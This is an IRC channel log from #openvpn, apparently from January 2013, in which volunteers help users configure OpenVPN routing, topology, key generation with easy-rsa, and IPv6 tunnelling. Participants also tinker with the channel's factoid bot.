? 19:26 < EugeneKay> No clue. I always just refer to the man page 19:26 < AlbinoGeek> Found it 19:26 < EugeneKay> Really though, see -devel :-p 19:26 < EugeneKay> They know a LOT more about all this than I do 19:26 < AlbinoGeek> On CentOS5 when using compiled docs it sits in: /usr/share/doc/openvpn-2.3.0/sample-config-files/ 19:26 < EugeneKay> Sounds right 19:27 -!- raidz is now known as raidz_away 19:27 < AlbinoGeek> So, without a "local" line it will bind to 0.0.0.0 yeah? 19:27 < EugeneKay> Yup 19:28 < AlbinoGeek> And should I need to push any settings for a standard setup? 19:28 < EugeneKay> WHere "standard" means "minimum", correct. 19:29 < EugeneKay> The most basic of VPNs is just a p2p link 19:29 < AlbinoGeek> And what of redirect-gateway ? 19:29 < EugeneKay> Note: I ALWAYS specify "topology subnet" 19:29 < EugeneKay> !topology 19:29 <@vpnHelper> "topology" is (#1) it is possible to avoid the !/30 behavior if you use 2.1+ with the option: topology subnet This will end up being default in later versions. or (#2) Clients will receive addresses ending in .2, .3, .4, etc, instead of being divided into 2-host subnets. or (#3) See http://osdir.com/ml/network.openvpn.devel/2005-09/msg00020.html for more history on this. 19:29 < EugeneKay> !/30 19:29 <@vpnHelper> "/30" is (#1) Default behaviour assigns a /30 subnet(4 addresses) to each peer. See http://goo.gl/6vemm for background or (#2) you can avoid this behavior by reading !topology or (#3) by default, first client is .6, then .10 .14 .18 etc or (#4) use openvpn --show-valid-subnets to see the subnets you can use in net30 or (#5) tl;dr Windows sucks, use --topology subnet in your server.conf 19:29 < EugeneKay> That's just a quick command to do the commonly-wanted "send all my internet traffic via the vpn" 19:29 < EugeneKay> !redirect 19:29 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart: 19:29 <@vpnHelper> http://ircpimps.org/redirect.png 19:30 < AlbinoGeek> Well, ipforward is already configured in sysctl, what else may i have to do? 19:30 < AlbinoGeek> I have enabled push for redirtect-gateway and enabled iptables masquarade. 19:31 < EugeneKay> Flowchart ;-) 19:31 < AlbinoGeek> Reading... 19:31 < AlbinoGeek> "VPN IP" being the default gateway when connected as seen by the client? 19:32 < EugeneKay> The IP address on the VPN link 19:32 < EugeneKay> eg, 10.8.0.1 19:32 < EugeneKay> If you use --topology subnet it gets a LOT easier to work with 19:32 < EugeneKay> Hence why I always use it. Always. 19:32 < AlbinoGeek> Well, I have no access to options sent to openvpn. 19:32 < EugeneKay> There are no good reasons to stick with !/30 19:32 < AlbinoGeek> (only the config file, and it doesn't take "topology" as an operand for whatever reason) 19:33 < EugeneKay> The config file? A line containing just "topology subnet" should do it find 19:33 -!- Orbi [~opera@anon-149-82.vpn.ipredator.se] has quit [Quit: Orbi] 19:33 < AlbinoGeek> EugeneKay: Yeah, it's erroring on that line, moment while I paste logs 19:33 < EugeneKay> !paste 19:33 <@vpnHelper> "paste" is "pastebin" is (#1) please paste anything with more than 5 lines into pastebin or a similar website, or (#2) ie: www.pastebin.ca 19:33 < AlbinoGeek> Saw that one already in the topic :) !logs 19:34 < EugeneKay> !forget paste 2 19:34 <@vpnHelper> Error: You don't have the factoids.forget capability. If you think that you should have this capability, be sure that you are identified before trying again. The 'whoami' command can tell you if you're identified. 19:34 < AlbinoGeek> !whoami 19:34 <@vpnHelper> I don't recognize you. 19:34 < AlbinoGeek> Lol 19:34 < AlbinoGeek> EugeneKay: Seems you need to auth :) 19:34 < EugeneKay> !learn paste as https://gist.github.com or http://www.pastebin.ca/ are great places to use 19:34 <@vpnHelper> Error: You don't have the factoids.learn capability. If you think that you should have this capability, be sure that you are identified before trying again. The 'whoami' command can tell you if you're identified. 19:34 < EugeneKay> What the 19:34 < EugeneKay> Gah, brb 19:34 < EugeneKay> I forget I changed my hostmask 19:35 < AlbinoGeek> EugeneKay: I wouldn't say pastebin.ca to be honest, probably gist.github.com or pastie.org 19:35 -!- EugeneKay [eugene@go-without.me] has quit [Quit: ZNC - http://znc.in] 19:35 -!- EugeneKay [eugene@itvends.com] has joined #openvpn 19:35 < AlbinoGeek> Welcome back. 19:35 < AlbinoGeek> itvends 19:35 < AlbinoGeek> ahah 19:35 < EugeneKay> !paste 19:35 <@vpnHelper> "paste" is "pastebin" is (#1) please paste anything with more than 5 lines into pastebin or a similar website, or (#2) ie: www.pastebin.ca 19:36 < EugeneKay> ;-) 19:36 < EugeneKay> Check the site 19:36 < EugeneKay> !forget paste 2 19:36 <@vpnHelper> Joo got it. 19:36 < AlbinoGeek> Eww, pastebin.ca is literally pastebinscript from pastebin.com :( 19:36 < EugeneKay> !learn paste as https://gist.github.com 19:36 <@vpnHelper> Joo got it. 19:36 < EugeneKay> !paste 19:36 <@vpnHelper> "paste" is https://gist.github.com 19:36 < EugeneKay> What the 19:36 < EugeneKay> !forget paste 19:36 <@vpnHelper> Joo got it. 19:36 < AlbinoGeek> !pastebin 19:36 <@vpnHelper> "pastebin" is please paste anything with more than 5 lines into pastebin or a similar website 19:36 < AlbinoGeek> ^ 19:37 < AlbinoGeek> That's why 19:37 < EugeneKay> Oh, that got fixed finally 19:37 < AlbinoGeek> "paste is pastebin" 19:37 < EugeneKay> Ya 19:37 < AlbinoGeek> !l 19:37 < EugeneKay> Now I get to try to remember how to do this 19:37 < AlbinoGeek> Okay good, it's not that wildcardy 19:37 < AlbinoGeek> !log 19:37 <@vpnHelper> Error: You don't have the owner capability. If you think that you should have this capability, be sure that you are identified before trying again. The 'whoami' command can tell you if you're identified. 19:37 < EugeneKay> It's a very restricted bot :-p 19:37 < AlbinoGeek> -_- Too close to the name of a factoid there. 19:37 < AlbinoGeek> !logs 19:37 <@vpnHelper> "logs" is (#1) is please pastebin your logfiles from both client and server with verb set to 5 or (#2) In the Windows client(OpenVPN-GUI) right-click the status icon and pick View Log or (#3) In the OS X client(Tunnelblick) right-click it nd select Copy log text to clipboard or (#4) if you dont know how to find your logs, see !logfile 19:38 < AlbinoGeek> YUS Starting openvpn: [ OK ] 19:38 < EugeneKay> !learn pastebin as https://gist.github.com is a recommended place to use 19:38 <@vpnHelper> Joo got it. 19:38 < EugeneKay> !pastebin 19:38 <@vpnHelper> "pastebin" is (#1) please paste anything with more than 5 lines into pastebin or a similar website or (#2) https://gist.github.com is a recommended place to use 19:38 < AlbinoGeek> !paste 19:38 < EugeneKay> !learn paste as @!pastebin 19:38 <@vpnHelper> Joo got it. 19:38 < EugeneKay> !paste 19:38 <@vpnHelper> "paste" is @!pastebin 19:38 < EugeneKay> Nope 19:38 < AlbinoGeek> Hahah 19:38 < EugeneKay> !forget paste 19:38 <@vpnHelper> Joo got it. 19:38 < AlbinoGeek> "pastebin" 19:39 < EugeneKay> !learn paste as pastebin 19:39 <@vpnHelper> Joo got it. 19:39 < EugeneKay> !paste 19:39 <@vpnHelper> "paste" is pastebin 19:39 < AlbinoGeek> "pastebin" 19:39 < EugeneKay> Ohhh gotcha 19:39 < EugeneKay> !forget paste 19:39 <@vpnHelper> Joo got it. 19:39 < EugeneKay> !learn paste as "pastebin" 19:39 <@vpnHelper> Joo got it. 19:39 < AlbinoGeek> !paste 19:39 < EugeneKay> !paste 19:39 <@vpnHelper> "paste" is pastebin 19:39 <@vpnHelper> "paste" is pastebin 19:39 < EugeneKay> Grrr 19:39 < AlbinoGeek> LOL angry bot is angry 19:39 < EugeneKay> !forget pastebin 19:39 <@vpnHelper> Error: 2 factoids have that key. Please specify which one to remove, or use * to designate all of them. 19:39 < EugeneKay> Gah no 19:39 < EugeneKay> !forget paste 19:39 <@vpnHelper> Joo got it. 19:39 < EugeneKay> !learn paste as [pastebin] 19:39 <@vpnHelper> Joo got it. 19:39 < EugeneKay> !paste 19:39 <@vpnHelper> "paste" is "pastebin" is (#1) please paste anything with more than 5 lines into pastebin or a similar website or (#2) https://gist.github.com is a recommended place to use 19:39 < AlbinoGeek> There we go 19:39 < EugeneKay> THERE we go. 19:40 < EugeneKay> Anyway 19:40 < AlbinoGeek> Test 19:40 < AlbinoGeek> Okay so 19:40 < EugeneKay> Back to the point, logs? 19:40 < AlbinoGeek> OpenVPN is now running 19:40 < AlbinoGeek> Client and server 19:40 < AlbinoGeek> Client is just spamming the & out of my screens 19:40 < AlbinoGeek> Finally sits at Initialization Sequence Completed 19:40 < AlbinoGeek> Okay so , flowchart time 19:40 < AlbinoGeek> 10.8.0.1 can be pinged. 19:41 < AlbinoGeek> Redirect-gateway is enabled. 19:41 < AlbinoGeek> 8.8.8.8 can be pinged. 19:41 < AlbinoGeek> Google.com can be pinged. 19:41 < EugeneKay> curl http://util.khresear.ch/myip?o=plain 19:41 < EugeneKay> (just my myip script) 19:41 < AlbinoGeek> http://secure-computing.net/ip.php shows my server's IP. 19:41 <@vpnHelper> Title: SCN: SCN (at secure-computing.net) 19:41 < EugeneKay> Everything sounds good, then 19:42 < AlbinoGeek> "it works" 19:42 < AlbinoGeek> Right, mastered Procedural Flowchart Analysis 101 19:42 < EugeneKay> So, what's the problem? 19:42 < AlbinoGeek> Now to try a real connection, voice control protocol; ICMP/IPX/TCP and UDP; bi-directional 19:42 < AlbinoGeek> brb while I try this... 19:43 < EugeneKay> Good luck 19:43 < AlbinoGeek> Literally 19:43 < ngharo> ipx, no. 19:43 < AlbinoGeek> Something tells me I'll need TAP and BRIDGED 19:43 < EugeneKay> !layer2 19:43 <@vpnHelper> "layer2" is (#1) you are using tap, what specific layer2 protocol do you need to work over the vpn? or (#2) Bridging looks like a good choice to people who don't know how to set up IP routing, but to learn routing is generally far better or (#3) protocols that use layer2 communicate by MAC address, not IP address 19:44 < EugeneKay> You nearly never need bridging 19:44 < AlbinoGeek> Oh wait a second, what the * is going on. 19:44 < AlbinoGeek> If I connect to the server's IP on anything, it uses my real connection instead of the VPN? 19:44 < EugeneKay> Yes 19:44 < AlbinoGeek> Is that just to prevent looping ? 19:44 < EugeneKay> Yup. 19:44 < AlbinoGeek> Okay so, I should be using 10.8.0.1 I guess? 19:44 < EugeneKay> Yup. 19:45 < ngharo> sure 19:46 < EugeneKay> Indeed 19:46 < AlbinoGeek> IPX is working in TUN... this doesn't make sense? 19:46 < EugeneKay> Between what? 19:46 < AlbinoGeek> Everything in your docs says "NO THIS WON'T WORK" 19:46 < AlbinoGeek> Between myself and the server, and between two clients on the same VPN. 19:46 < AlbinoGeek> (both using the server as a VPN *) 19:47 < EugeneKay> Don't confusing routed and bridged modes with tun vs tap devices 19:47 < EugeneKay> You can pass layer2 packets over a tap device running in routed mode 19:47 < AlbinoGeek> Well, it's tun and routed right now, and IPX is working. 19:48 < AlbinoGeek> Both client and server are practically using default configs, just with paths changed. 19:48 < EugeneKay> o.O 19:48 < ngharo> 0.o indeed 19:48 < AlbinoGeek> I will not complain! 19:48 < EugeneKay> I'm sure there's something going on 19:48 < EugeneKay> Maybe it's a 2.3.x thing 19:49 < EugeneKay> In any case, if it works, stop yer bitchin 19:49 < ngharo> sounds like a bug unfortunately if it does work 19:49 < AlbinoGeek> I had to enable ipv6 ipforward in sysctl to get things working, but that was common sense since it said to do it for ipv4 19:50 < AlbinoGeek> Is it possible to tunnel IPX though another protocol ? 19:50 < EugeneKay> Layer2 :-p 19:50 < AlbinoGeek> EugeneKay: Yes, but without Layer2? ie: abstractly 19:50 < AlbinoGeek> (just thinking out loud) ; kinda how "virtual ipv6" was for a while? 19:50 < AlbinoGeek> Otherwise I have 0 idea how this is working ,and won't complain. 19:51 < AlbinoGeek> . 19:51 < AlbinoGeek> ^whois 19:51 < AlbinoGeek> I am AcademyInt@academyintl/director/AcademyIntl 19:52 < AlbinoGeek> Does anyone see my hostname or anything else, or does FOSS cut that out? 19:52 < EugeneKay> Shows as that here too 19:52 < EugeneKay> Freenode's cloak cuts it out 19:52 < AlbinoGeek> Ahh, okay. I won't be able to check if IRC kicked over then. 19:52 < EugeneKay> If you /whois yourself it should say "is connection from" 19:52 -!- wh1p [~wh1pl4sh@host-2-100-148-6.as13285.net] has joined #openvpn 19:52 -!- wh1p [~wh1pl4sh@host-2-100-148-6.as13285.net] has quit [Client Quit] 19:53 < EugeneKay> connecting* 19:53 < AlbinoGeek> AlbinoGeek's info: is connecting from *@you.would.like.to.know 127.0.0.1 19:53 < EugeneKay> I can't spell tonight. Need more booze 19:53 < AlbinoGeek> I'm pretty sure my client removes that :x 19:53 < AlbinoGeek> This client is more skiddy than a real IRC client, so I'm not surprised it filters / randomly changes things. 19:54 < EugeneKay> Aha 19:54 < EugeneKay> HexChat shows it fine 19:54 < AlbinoGeek> EugeneKay: Ahh, so you know what a Skid is? :P 19:54 < EugeneKay> Nope 19:54 < AlbinoGeek> So, I can't use the same client keypair on another machine, can I? 19:54 < AlbinoGeek> What will happen if I do? 19:55 < EugeneKay> You can. If you connect, the default is to knock off any previously-connected clients(identified by IP+source port) using the same common-name 19:55 < EugeneKay> Look at --duplicate-cn 19:55 < AlbinoGeek> Well, username-as-cn is on, so that'd be a bad idea to try I guess. 19:56 < EugeneKay> Yeah 19:57 < AlbinoGeek> EugeneKay: Uhoh, it won't let me make more client keys. 19:57 < EugeneKay> o.O ? 19:57 < AlbinoGeek> That big "reset everything" error 19:57 < AlbinoGeek> EugeneKay: http://pastie.org/5722988 19:58 < EugeneKay> Oh 19:58 < EugeneKay> Just run 'source ./vars' 19:58 < AlbinoGeek> (because I've already built my dh ?) 19:58 < EugeneKay> All it's saying is that your current bash session doesn't have the right set of env vars defined 19:58 < AlbinoGeek> ./vars: No such file or directory 19:58 < AlbinoGeek> there's a "vars" file in the cd 19:58 < EugeneKay> Did you copy easy-rsa someplace? :-p 19:58 < EugeneKay> You should have a vars file 19:59 < AlbinoGeek> There is a vars file, I can see it in ls-lisa 19:59 < EugeneKay> That's the one you wanna source 19:59 < EugeneKay> It's just some basic stuff about your CA 19:59 < AlbinoGeek> NOTE: If you run ./clean-all, I will be doing a rm -rf on /etc/openvpn/easy-rsa/2.0/keys 19:59 < AlbinoGeek> Just a warning I guess? 19:59 < EugeneKay> So don't do that 19:59 < EugeneKay> Ya. The HOWTO says to do clean-all 19:59 < EugeneKay> If you're just adding a new keypair, DONT do that 19:59 < AlbinoGeek> Yeah, obvs :) 19:59 < EugeneKay> (another place the docs could use work) 20:00 < AlbinoGeek> I know what rm-rf does, unlike some Ubuntu people.... 20:00 < EugeneKay> Hehehe 20:00 < AlbinoGeek> Comitting.. and downloading. Nice. 20:00 < AlbinoGeek> Hopefully this works, if so then I'll be out of your hair. 20:01 < EugeneKay> You seem to know what you're talking about. A welcome respite 20:01 < EugeneKay> Feel free to stick around ;-) 20:01 < AlbinoGeek> How lively is this channel exactly, OpenVPN seems to have scared off many of its prospective users by being so cryptic in its setup instructions. 20:02 < AlbinoGeek> Myself included for a while. 20:02 < EugeneKay> We get a few people a day 20:02 < EugeneKay> Networking is not for the light-of-heart 20:02 < EugeneKay> !101 20:02 <@vpnHelper> "101" is This channel is not a '101' replacement for any of the following topics or others: Networking, Firewalls, Routing, Your OS, Security, etc etc 20:02 < EugeneKay> We're not scared to point to that ^ 20:03 < AlbinoGeek> Perhaps, but at least some documentation should be there :). I suppose I'll have to submit these changes. 20:04 < AlbinoGeek> I've chosen to head the docs I write in a sense of "howto" from your operating system and distro point of view, with all pathnames and commands on that page listed only for your selected distro and OS to prevent confusion. 20:04 < AlbinoGeek> I've finished CentOS 5 for client and server, now writing Windows 7 client/server docs. 20:04 < EugeneKay> !windows 20:04 <@vpnHelper> "windows" is (#1) computers are like air conditioners, they work well until you open windows. or (#2) http://secure-computing.net/files/windows.jpg for funny or (#3) http://secure-computing.net/files/windows_2.jpg for more funny 20:05 < AlbinoGeek> Both jpg links are dead. 20:05 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has joined #openvpn 20:05 * EugeneKay smacks ecrist 20:05 < AlbinoGeek> Needs more funny 20:06 -!- cyberspace- [20253@ninthfloor.org] has quit [Quit: leaving] 20:06 < AlbinoGeek> Interesting, 64bit OpenVPN windows does not run on Windows 7 64bit Enterprise 20:06 < AlbinoGeek> :/ 20:06 < AlbinoGeek> Architecture mismatch error. 20:06 < EugeneKay> There's a x64 build nowadays? 20:06 < EugeneKay> WOwza 20:06 < AlbinoGeek> Ehh, the 32bit works fine. 20:07 -!- cyberspace- [20253@ninthfloor.org] has joined #openvpn 20:08 < AlbinoGeek> EugeneKay: And what were you talking about /30 earlier? I didn't do your topology thing (never got around to it) and my clients are being named sanely 20:08 < AlbinoGeek> .10 .11 .12 .13 so far. 20:08 < EugeneKay> o.O 20:08 < EugeneKay> !/30 20:08 <@vpnHelper> "/30" is (#1) Default behaviour assigns a /30 subnet(4 addresses) to each peer. See http://goo.gl/6vemm for background or (#2) you can avoid this behavior by reading !topology or (#3) by default, first client is .6, then .10 .14 .18 etc or (#4) use openvpn --show-valid-subnets to see the subnets you can use in net30 or (#5) tl;dr Windows sucks, use --topology subnet in your server.conf 20:08 < EugeneKay> AFAIK they didn't change the default in 2.3 20:08 < EugeneKay> But I haven't used it, so. 20:08 < AlbinoGeek> I don't think they have. 20:09 < AlbinoGeek> Mind you some machines have ipv4 disabled, not entirely sure why they are still being assigned an ipv4 address. 20:09 < AlbinoGeek> Nevermind, ipv4 disabled on the physical NIC, not the virtual tuns. 20:09 -!- Valcorb [~Valcorb@94-226-106-113.access.telenet.be] has quit [] 20:10 <+rob0> Hmmm. "OpenVPN seems to have scared off many of its prospective users," well no, I have not seen evidence of that; "by being so cryptic in its setup instructions." No, this is not so. The HOWTO and manual and mini-howto docs are excellent. 20:12 < AlbinoGeek> rob0: Ehh, when the second step tells you about routed / bridged ; that's enough to scare off most. 20:12 <+rob0> It simply means you need to learn more about basic networking before you step into advanced networking. 20:56 -!- p47 [~Marcos1@189.232.114.214] has joined #openvpn 21:01 -!- Carbon_Monoxide [~cmonxide@058176022144.ctinets.com] has joined #openvpn 21:01 -!- cjs226 [~cjs226@99-61-64-43.lightspeed.austtx.sbcglobal.net] has quit [] 21:05 -!- p47 [~Marcos1@189.232.114.214] has quit [Quit: Saliendo] 21:34 -!- amir [~amir@unaffiliated/amir] has quit [Ping timeout: 260 seconds] 21:34 -!- amir [~amir@unaffiliated/amir] has joined #openvpn 22:00 -!- cornfeedhobo [~cornfeedh@unaffiliated/cornfeed] has joined #openvpn 22:07 -!- Carbon_Monoxide [~cmonxide@058176022144.ctinets.com] has quit [Ping timeout: 252 seconds] 22:13 -!- Carbon_Monoxide [~cmonxide@058176022144.ctinets.com] has joined #openvpn 23:17 -!- brute11k1 [~brute11k@89.249.230.101] has quit [Quit: Leaving.] 23:23 -!- cjs226 [~cjs226@99-61-64-43.lightspeed.austtx.sbcglobal.net] has joined #openvpn 23:24 -!- JPeterson [~JPeterson@s213-103-211-58.cust.tele2.se] has quit [Ping timeout: 256 seconds] 23:29 -!- JPeterson [~JPeterson@s213-103-211-58.cust.tele2.se] has joined #openvpn 23:30 -!- JPeterson [~JPeterson@s213-103-211-58.cust.tele2.se] has quit [Excess Flood] 23:31 -!- JPeterson [~JPeterson@s213-103-211-58.cust.tele2.se] has joined #openvpn 23:34 -!- MeanderingCode_ [~Meanderin@71-213-175-129.albq.qwest.net] has joined #openvpn 23:34 -!- MeanderingCode [~Meanderin@71-213-175-129.albq.qwest.net] has quit [Ping timeout: 248 seconds] 23:35 <@novaflash> rob0; i had a guy asking me to teamviewer with him - 10 times before i kicked him - to set up a vpn server for him... but the guy didn't even know what a subdomain was. 23:55 -!- zeeshoem is now known as mnathani --- Day changed Sat Jan 19 2013 00:43 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Remote host closed the connection] 00:45 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn 01:28 -!- djc [~djc@gentoo/developer/djc] has joined #openvpn 01:28 < djc> do people here know about the iOS app, or should I sent email? 01:28 < djc> my route-gateway stuff doesn't seem to work on my iPad 01:29 -!- Cpt-Oblivious [~Cpt-Obliv@a202101.upc-a.chello.nl] has quit [] 01:29 < djc> i.e. 'push "route 10.33.3.0 255.255.255.0"' on the server 01:30 < djc> but when I try to go to 10.33.3.12 in the browser, it can't find it 01:46 -!- kunji [~kunji@c-68-60-83-138.hsd1.mi.comcast.net] has left #openvpn [] 01:53 -!- ducblangis [~Ducblangi@24-117-207-111.cpe.cableone.net] has joined #openvpn 01:54 -!- mattock is now known as mattock_afk 01:59 < AlbinoGeek> !layer2 01:59 <@vpnHelper> "layer2" is (#1) you are using tap, what specific layer2 protocol do you need to work over the vpn? or (#2) Bridging looks like a good choice to people who don't know how to set up IP routing, but to learn routing is generally far better or (#3) protocols that use layer2 communicate by MAC address, not IP address 02:00 < djc> well, I'm not using tap, and I know a bit of routing 02:00 < djc> so that's not very helpful 02:10 -!- Wulf [~Wulf@unaffiliated/wulf] has quit [Ping timeout: 252 seconds] 02:21 -!- Carbon_Monoxide [~cmonxide@058176022144.ctinets.com] has quit [Ping timeout: 245 seconds] 02:38 -!- Carbon_Monoxide [~cmonxide@058176022144.ctinets.com] has joined #openvpn 02:52 -!- Porkepix [~Porkepix@lns-bzn-20-82-64-31-107.adsl.proxad.net] has quit [Ping timeout: 245 seconds] 02:56 -!- Porkepix [~Porkepix@lns-bzn-20-82-64-31-107.adsl.proxad.net] has joined #openvpn 03:03 -!- brute11k [~brute11k@89.249.230.101] has joined #openvpn 03:15 -!- novaflash [~novaflash@openvpn/corp/support/novaflash] has quit [Ping timeout: 276 seconds] 03:26 < AlbinoGeek> djc: Sorry, I was trying to find something myself. 03:26 -!- novaflash_away [~novaflash@vpnserver1.jellemaautomatisering.nl] has joined #openvpn 03:26 -!- novaflash_away is now known as novaflash 03:32 -!- novaflash [~novaflash@vpnserver1.jellemaautomatisering.nl] has quit [Changing host] 03:32 -!- novaflash [~novaflash@openvpn/corp/support/novaflash] has joined #openvpn 03:32 -!- mode/#openvpn [+o novaflash] by ChanServ 03:38 -!- Wulf [~Wulf@unaffiliated/wulf] has joined #openvpn 03:38 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 03:38 -!- ade_b [~Ade@kista.guest.accome.com] has joined #openvpn 03:38 -!- ade_b [~Ade@kista.guest.accome.com] has quit [Changing host] 03:38 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 03:47 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 240 seconds] 04:07 -!- ade_b [~Ade@kista.guest.accome.com] has joined #openvpn 04:07 -!- ade_b [~Ade@kista.guest.accome.com] has quit [Changing host] 04:07 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 04:08 -!- dydzEz2 [dydzEz2@c-67-163-13-78.hsd1.il.comcast.net] has joined #openvpn 04:11 -!- swat [~swat@ubuntu/member/swat] has quit [Quit: Leaving.] 04:17 < EugeneKay> djc - not a clue about iOS. Sorry. 04:55 -!- Carbon_Monoxide [~cmonxide@058176022144.ctinets.com] has quit [Ping timeout: 245 seconds] 05:28 -!- s7r [~s7r@openvpn/user/s7r] has joined #openvpn 05:28 -!- mode/#openvpn [+v s7r] by ChanServ 05:39 -!- eutheria [~euther0a@cpc2-cmbg15-2-0-cust990.5-4.cable.virginmedia.com] has joined #openvpn 05:43 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 05:44 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 05:49 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 05:51 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 05:53 -!- havoc [~havoc@neptune.chaillet.net] has quit [Ping timeout: 255 seconds] 06:04 -!- Thermi_ [~Thermi@HSI-KBW-078-043-018-016.hsi4.kabel-badenwuerttemberg.de] has quit [Quit: ZNC - http://znc.in] 06:10 -!- Thermi [~Thermi@HSI-KBW-078-043-018-016.hsi4.kabel-badenwuerttemberg.de] has joined #openvpn 06:37 -!- Valcorb [~Valcorb@199.229.249.189] has joined #openvpn 06:48 -!- Fritzah [u291187@ool-44c4f941.dyn.optonline.net] has joined #openvpn 07:00 -!- Fritzah [u291187@ool-44c4f941.dyn.optonline.net] has quit [Remote host closed the connection] 07:05 -!- Valcorb [~Valcorb@199.229.249.189] has quit [Ping timeout: 255 seconds] 07:05 -!- Fritzah [u291187@ool-44c4f941.dyn.optonline.net] has joined #openvpn 07:05 -!- Valcorb [~Valcorb@94-226-106-113.access.telenet.be] has joined #openvpn 07:10 -!- Valcorb [~Valcorb@94-226-106-113.access.telenet.be] has quit [Read error: Connection reset by peer] 07:16 -!- Fritzah [u291187@ool-44c4f941.dyn.optonline.net] has left #openvpn [] 07:17 < Freeaqingme> With 2.2, can I use a tunnel (tun, no tap) that is set up over ipv4, and which tunnels ipv6 traffic? 07:19 < Wulf> Freeaqingme: probably 07:20 < Wulf> I never tried but I'd be really surprised if it does not work 07:20 < Freeaqingme> well, there's this: http://openvpn.net/index.php/open-source/faq/77-server/287-is-ipv6-support-plannedin-the-works.html 07:20 <@vpnHelper> Title: Is IPv6 support planned/in the works? (at openvpn.net) 07:21 < Freeaqingme> so if it is supported, it is really recently. But I'm not sure if the article implies if the limitations apply to <2.2rc2, or that they also apply to 2.2 07:21 < Wulf> oh. 07:22 < Wulf> then go and use 2.3; it was released not long ago 07:22 < Freeaqingme> I'm seeing that just now! if I can find an ubuntu package.. 07:23 < Wulf> make your own 07:24 < Freeaqingme> Wulf, got it ;) http://repos.openvpn.net/repos/apt/conf/repos.openvpn.net-precise-snapshots.txt 07:26 -!- Valcorb [~Valcorb@199.229.249.189] has joined #openvpn 07:33 -!- Valcorb [~Valcorb@199.229.249.189] has quit [Ping timeout: 256 seconds] 07:39 -!- nucleo [nucleo@fedora/nucleo] has joined #openvpn 07:40 -!- havoc [~havoc@neptune.chaillet.net] has joined #openvpn 08:37 -!- scyld [~scyld@unaffiliated/wasyl] has joined #openvpn 08:38 < plaisthos> Freeaqingme: no 2.2 does not that 08:38 < plaisthos> Freeaqingme: the ubuntu packages includes the ipv6 patches 08:38 < plaisthos> so should work we as well 08:51 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Ping timeout: 244 seconds] 09:03 -!- JackWinter2 [~jack@vodsl-4655.vo.lu] has joined #openvpn 09:04 -!- emmanuelux [~emmanuelu@vpn7.freedom-ip.com] has joined #openvpn 09:08 -!- JackWinter2 [~jack@vodsl-4655.vo.lu] has quit [Client Quit] 09:22 -!- Qianyi [~Qianyi@180.155.14.35] has joined #openvpn 09:22 < Qianyi> hi 09:22 < Qianyi> can't visit openvpn.net, could anyone please provide another link to download the newest beta for windows of openvpn? 09:22 < Qianyi> :) 09:34 -!- mattock_afk is now known as mattock 09:39 -!- Carbon_Monoxide [~cmonxide@058176022144.ctinets.com] has joined #openvpn 09:40 -!- cjs226 [~cjs226@99-61-64-43.lightspeed.austtx.sbcglobal.net] has quit [Ping timeout: 256 seconds] 09:42 -!- cjs226 [~cjs226@99-61-64-43.lightspeed.austtx.sbcglobal.net] has joined #openvpn 10:00 -!- Valcorb [~Valcorb@94-226-106-113.access.telenet.be] has joined #openvpn 10:00 -!- Valcorb [~Valcorb@94-226-106-113.access.telenet.be] has quit [Client Quit] 10:04 -!- Qianyi [~Qianyi@180.155.14.35] has quit [Read error: Connection reset by peer] 10:04 -!- Qianyi [~Qianyi@180.155.14.35] has joined #openvpn 10:07 <+rob0> beta? There is no beta at this time. 2.3 is the current release. 10:07 -!- eutheria [~euther0a@cpc2-cmbg15-2-0-cust990.5-4.cable.virginmedia.com] has quit [Remote host closed the connection] 10:09 -!- Valcorb [Valcorb@94-226-106-113.access.telenet.be] has joined #openvpn 10:18 -!- JackWinter [~jack@vodsl-4655.vo.lu] has left #openvpn ["Konversation terminated!"] 10:18 -!- Carbon_Monoxide [~cmonxide@058176022144.ctinets.com] has quit [Quit: Leaving] 10:19 -!- JackWinter [~jack@vodsl-4655.vo.lu] has joined #openvpn 10:23 -!- master_of_master [~master_of@p57B53191.dip.t-dialin.net] has quit [Ping timeout: 244 seconds] 10:24 -!- master_of_master [~master_of@p57B53F05.dip.t-dialin.net] has joined #openvpn 10:27 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 244 seconds] 10:29 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 10:29 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 10:43 -!- Valcorb [Valcorb@94-226-106-113.access.telenet.be] has quit [Read error: Connection reset by peer] 10:52 -!- Valcorb [~Valcorb@94-226-106-113.access.telenet.be] has joined #openvpn 10:52 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 245 seconds] 10:55 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 10:56 -!- djc [~djc@gentoo/developer/djc] has left #openvpn [] 10:57 < Qianyi> rob0, i mean 2.3 rc2 10:57 < Freeaqingme> Wulf, vpnHelper There's one remark though: Options error: --server-ipv6 settings: only /64../112 supported right now (not /122) 10:57 < Qianyi> would anyone have a mirror or link? 10:58 <+rob0> Qianyi, you should use the final release version, not rc2. 10:59 <+rob0> sorry, I do not know of alternate download sites, if Google can't find them. 11:00 < Qianyi> np thanks 11:03 -!- b1rkh0ff [~b1rkh0ff@178.77.1.28] has joined #openvpn 11:19 -!- Valcorb [~Valcorb@94-226-106-113.access.telenet.be] has quit [Ping timeout: 244 seconds] 11:25 -!- JackWinter [~jack@vodsl-4655.vo.lu] has quit [Quit: ZNC - http://znc.in] 11:26 